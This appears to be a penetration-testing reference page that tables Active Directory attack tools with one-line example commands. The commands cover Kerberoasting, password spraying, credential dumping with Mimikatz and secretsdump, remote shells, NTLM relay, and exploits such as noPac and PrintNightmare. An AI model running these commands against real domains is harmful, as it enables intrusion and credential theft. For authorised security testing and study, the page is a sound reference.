Tools

Note: Always verify tool source code to avoid security risks.

Enumeration & Situational Awareness Tools

Tool

Description

Use Case

Platform

PowerView / SharpView

PowerShell/.NET tools for AD enumeration

Identify users, groups, permissions; find Kerberoasting or ASREPRoasting targets

Windows

BloodHound

Visualizes AD relationships

Map privilege escalation paths

Windows / Linux

SharpHound

C# data collector for BloodHound

Gather AD objects (users, groups, ACLs)

Windows

BloodHound.py

Python-based BloodHound data collector

Collect AD data from Linux hosts

Linux

ldapsearch

LDAP querying tool

Enumerate users, groups, computers

Linux

windapsearch

Simplifies LDAP queries

Targeted AD enumeration

Linux

adidnsdump

Dumps AD DNS records

Identify hosts and services

Any

Active Directory Explorer

GUI browser for AD database

Analyze object properties or offline snapshots

Windows

ADRecon

Generates Excel reports on AD

Highlight AD security weaknesses

Windows

Attack & Exploitation Tools

Enumeration & Brute Forcing

Tool

Description

Use Case

Example Command

Kerbrute

Go-based Kerberos enumeration

Discover valid usernames and weak passwords

kerbrute userenum -d <domain> userlist.txt

Impacket - GetNPUsers.py

ASREPRoasting tool

Extract AS-REP hashes for offline cracking

GetNPUsers.py -dc-ip <IP> <domain>/ -usersfile users.txt

CrackMapExec (CME)

SMB/WinRM/MSSQL enumeration

Password spraying, share enumeration

cme smb <ip> -u <user> -p <pass>

DomainPasswordSpray.ps1

PowerShell password spraying

Test weak passwords, avoid lockouts

Invoke-DomainPasswordSpray -PasswordList passwords.txt

Kerberos Attacks

Tool

Description

Use Case

Example Command

Impacket - GetUserSPNs.py

SPN enumeration for Kerberoasting

Extract service tickets for offline cracking

GetUserSPNs.py <domain>/<user>:<pass> -request

Rubeus

Kerberos abuse toolkit

Kerberoasting, Pass-the-Ticket, Overpass-the-Hash

Rubeus.exe kerberoast

ticketer.py

Create custom TGT/TGS tickets

Golden Ticket / Silver Ticket creation

ticketer.py -nthash <hash> -domain-sid <SID> -domain <domain>

Credential Harvesting & Post-Exploitation

Tool

Description

Use Case

Example Command

Mimikatz

Extracts passwords, hashes, tickets

Credential dumping, Pass-the-Hash

mimikatz.exe "sekurlsa::logonpasswords" exit

secretsdump.py

Dumps LSA secrets & NTLM hashes

Offline hash extraction

secretsdump.py <domain>/<user>:<pass>@<ip>

evil-winrm

WinRM shell

Post-exploitation remote access

evil-winrm -i <ip> -u <user> -p <pass>

psexec.py / wmiexec.py

RCE via SMB/WMI

Lateral movement

psexec.py <domain>/<user>:<pass>@<ip>

Relay & Spoofing Attacks

Tool

Description

Use Case

Example Command

Responder

LLMNR/NBT-NS/MDNS poisoning

Capture NetNTLMv1/v2 hashes

responder -I eth0

Inveigh / InveighZero

PowerShell/.NET spoofing

Capture NetNTLM hashes

Invoke-Inveigh -ConsoleOutput

ntlmrelayx.py

NTLM relay attacks

Pivot & gain shells

ntlmrelayx.py -t smb://<target>

Exploits & Vulnerability Tools

Tool

Description

Use Case

Example Command

noPac.py

Exploits CVE-2021-42278/42287

Privilege escalation to DA

noPac.py <domain>/<user>:<pass>@<dc>

PetitPotam.py

Forces NTLM auth via Print Spooler

Coerce authentication to relays

PetitPotam.py <listener_IP> <target_IP>

CVE-2021-1675.py

PrintNightmare exploit

RCE via Print Spooler

CVE-2021-1675.py <domain>/<user>:<pass>@<ip>

Native Tools

Tool

Description

Use Case

Example Command

setspn.exe

Manage SPNs

Find SPNs for Kerberoasting

setspn -Q */*

rpcdump.py

Enumerate RPC interfaces

Identify exposed services

rpcdump.py <target>

raiseChild.py

Abuse domain trusts

Cross-domain escalation

N/A

Tool

Description

Use Case

Example Command

smbmap

SMB share enumeration

Find accessible shares

smbmap -H <target_IP> -u <user> -p <pass>

Snaffler

Search for sensitive files

Locate credentials in shares

snaffler -s <target_IP> -u <domain>\<user>

smbserver.py

Create SMB server

File transfer between hosts

smbserver.py SHARE /path/to/share

Security Auditing Tools

Tool

Description

Use Case

Example Command

LAPSToolkit

Audit Microsoft LAPS

Exploit LAPS misconfigs

Get-LAPSComputers

PingCastle

AD health check

AD security assessment

pingcastle --healthcheck

Group3r

GPO enumeration

Find insecure GPOs

group3r -d <domain>

gpp-decrypt

Decrypt GPP passwords

Extract plaintext from GPP XML

gpp-decrypt <encrypted_string>

RPC & Protocol Enumeration

Tool

Description

Use Case

Example Command

rpcinfo

List RPC programs

Enumerate active RPC services

rpcinfo -p <target_IP>

rpcclient

AD RPC enumeration

List users, groups, shares

rpcclient -U "<domain>\<user>%<pass>" <DC_IP>

PreviousActive Directory Enumeration and Attacks NextExternal and Internal Enumeration

Last updated 1 month ago

Enumeration & Situational Awareness Tools

Attack & Exploitation Tools

Enumeration & Brute Forcing

Kerberos Attacks

Credential Harvesting & Post-Exploitation

Relay & Spoofing Attacks

Exploits & Vulnerability Tools

Native Tools

SMB Enumeration & File Share Tools

Security Auditing Tools

RPC & Protocol Enumeration